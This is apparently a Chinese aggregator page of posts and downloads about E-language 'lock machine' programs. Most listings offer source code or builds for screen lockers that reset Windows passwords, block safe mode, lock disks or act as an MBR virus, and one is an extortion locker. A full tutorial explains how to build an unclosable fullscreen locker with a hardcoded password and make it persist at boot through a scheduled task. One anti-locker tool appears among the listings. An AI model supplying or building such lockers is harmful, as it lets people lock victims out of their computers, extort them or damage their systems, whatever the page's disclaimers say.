精华内容
下载资源
问答
  • 【重榜】易语言锁机病毒模块分享!!!!
    千次阅读
    2019-01-23 12:17:56

    锁机病毒的锁机密码:318758393

    代码已经写完整了,

    仅需要你在要用到的地方写到:
    锁机病毒()

    便会自动调用病毒代码,

    还请各位别拿去干坏事,

    你可以用来做控制自己朋友玩游戏用,

    易语言锁机病毒模块,
    仅供需要的小白使用,

    下载地址:
    https://www.lanzous.com/i2yk4di

    短链接下载地址:
    http://t.cn/E5H6CtL

    备份网盘下载地址:
    https://quqi.com/73750/3276

    更多相关内容
  • 易语言锁机教程

    2018-06-29 17:38:03
    易语言锁机教程,我开源已经很不容易了。求支持。自己看,可以制作出锁机
  • 易语言锁机软件源码

    2017-09-04 18:27:12
    易语言锁机软件源码,功能强大...
  • 易语言强制锁机 电脑锁机软件源代码 无法进入安全模式 强制锁系统 重启要输入你设置的开机密码 可按要求修改电脑用户名 请修改好源码后再使用 出现任何情况与作者无关!!仅供学习研究使用
  • 易语言锁机源码

    2015-08-31 18:22:49
    文件为易语言源码,请使用易语言运行,修改后运行将修改电脑开机密码,创建新用户,重启,以达到最佳整人效果
  • 易语言锁机源码.zip

    2020-02-07 06:05:58
    易语言锁机源码。 易语言源码,可以自行学习锁机原理,以免日后被居心不良的人锁机之后,无所适从。 学习进攻的过程就是在学习防守!
  • 内含锁机源码,无法进入安全模式,强制锁系统,重启需要你设置的开机密码,可使电脑强力锁机,请修改好源码后再使用 出现任何情况与作者无关!!
  • 破环里极强的黑客锁机易语言源码无法进入安全模式 强制锁系统 重启要输入你设置的开机密码 可按要求修改电脑用户名 请修改好源码后再使用 出现任何情况与作者无关。
  • 自制的易语言锁机小软件,现在要点资源分还容易吗QAQ
  • 易语言锁机

    2015-10-04 17:37:58
    易语言锁机
  • 易语言挂机源码
  • 适合初学易语言的同学学习
  • 易语言 启动项 全屏
  • 易语言锁机敲竹杠

    2018-11-04 23:40:30
    易语言敲竹杠锁机,无解!易语言敲竹杠锁机,无解!易语言敲竹杠锁机,无解!
  • 易语言强制锁机源码

    2015-02-01 23:29:17
    无法进入安全模式 强制系统 重启要输入你设置的开机密码 可按要求修改电脑用户名 请修改好源码后再使用 出现任何情况与作者无关!!
  • 当别人打开这软件 这软件会修改window启动密码 达到整人效果!
  • 易语言lock挂机源码
  • 易语言防锁机工具,可以有效的防止易语言锁机软件的攻击,真实有效内有说明 希望采纳谢谢Thanks♪(・ω・)ノ 你买了保证不吃亏系列.................................................................................
  • 锁机源码仅供参考
  • 如何用易语言锁机软件

    千次阅读 2020-08-02 16:46:39
    如何用易语言锁机软件 工具:电脑 易语言(那不废话吗) 打开易语言,单机“程序”选择“新建”,选择"windows窗口程序"单击确定 把窗口调大,并修改窗口属性,写改为我这样(如下图) 单机“扩展组件1” 选择...

    如何用易语言做锁机软件

    工具:电脑 易语言(那不废话吗)
    打开易语言,单机“程序”选择“新建”,选择"windows窗口程序"单击确定
    在这里插入图片描述
    在这里插入图片描述
    把窗口调大,并修改窗口属性,写改为我这样(如下图)
    在这里插入图片描述
    单机“扩展组件1”
    选择“透明标签”,在页面上绘制
    在这里插入图片描述
    输入文字,并调整文字大小在这里插入图片描述
    在基本组件里插入一个“编辑框”和“按钮”
    在这里插入图片描述
    调整“按钮”文字大小及内容
    在这里插入图片描述
    双击“确认”准备输入代码(确认是你刚才的按钮)
    在“启动窗口创建完毕”下边写


    .版本 2

    .子程序 __启动窗口_可否被关闭, 逻辑型

    返回 (假)

    .子程序 _按钮1_被单击

    .如果 (编辑框1.内容 = “123456”)
    销毁 ()

    在这里插入图片描述


    注:“123456为你想设定的密码”
    原理:第一行至第三行为“所有办法都不可以关闭此程序”,第四行至第六行为“如果输入框的内容=123456就关闭此程序,否则没变化。”
    选择“编译”在选择“静态编译”
    在这里插入图片描述
    然后输入文件名,单击保存
    在这里插入图片描述
    选择“此电脑”右键“管理”
    在这里插入图片描述
    双机“任务计划程序”选择“任务计划程序库”
    在这里插入图片描述
    单机右上角的“新建任务”
    名称随便输,下边的配置选择“第一个”
    点上边的“触发器”选择“新建”“开始任务”选择“启动时”单机“确定”
    点上边的“操作”选择“新建”单机“预览”然后选择用易语言导出的程序,点“确定”即可

    不许用来做坏事,要做好公民

    不许用来做坏事,要做好公民

    不许用来做坏事,要做好公民

    作者id:csdn_leitianshuo,作者昵称:#Initialization( ),转载请添加出处“https://blog.csdn.net/csdn_leitianshuo/article/details/107745452”

    展开全文
  • 本源码是易语言言软件可以制作软件 只有别人点击了软件 电脑马上关机 就要你设置的密码
  • 易语言源码易语言全能屏幕源码.rar
  • 易语言硬盘源码,破坏力大,无法进入安全模式,重启要输入你设置的密码 可以在源码内修改密码,请修改好源码后再使用 出现任何情况与作者无关!!该源码仅用于技术交流,出现任何后果与本人无关。
  • 易语言程序加解锁源码
  • 易语言防止U盘自启动

    2020-07-15 13:02:55
    易语言防止U盘自启动源码,防止U盘自启动,MsgProc,检测,SetWindowLong,CallWindowProc,复制结构体
  • 炫酷锁机软件,由易语言编写,推荐下载研究。 炫酷黑客界面电脑锁机源码+成品软件是一款易语言炫酷黑客界面锁机软件+源码,本源码被修改界面是1600*900 意思就是你电脑分辨率是这这么大的话 本软件就可以完全占满你...
  • mbr病毒易语言源码

    2018-10-03 09:14:53
    mbr病毒易语言源码,可在虚拟机上试,小心被,被自行解决
  • 可以控制 18 路继电器, 我演示的时候只接了 4 路继电器 可以接 7 路模拟量输入的传感器, 可以输出PWM信号. 可以用来采集数字信号状态, 接入各种传感器模块采集IO状态, 也可以采集模拟信号 比如用数字IO可以采集开关...
  • 安卓锁机源码软件源码非易语言源码 此源码是点睛网赚会员投稿来的最新源码 解压密码dianjingwz_com 据说这个源码很牛B转化挺高的 大家拿可以自己用也可以卖钱来的!!
  • 易语言锁定计算机

    2020-07-15 09:16:22
    易语言锁定计算机源码,锁定计算机

空空如也

空空如也

1 2 3 4 5 ... 14
收藏数 273
精华内容 109
关键字:

易语言锁机

友情链接: LDVTFS.zip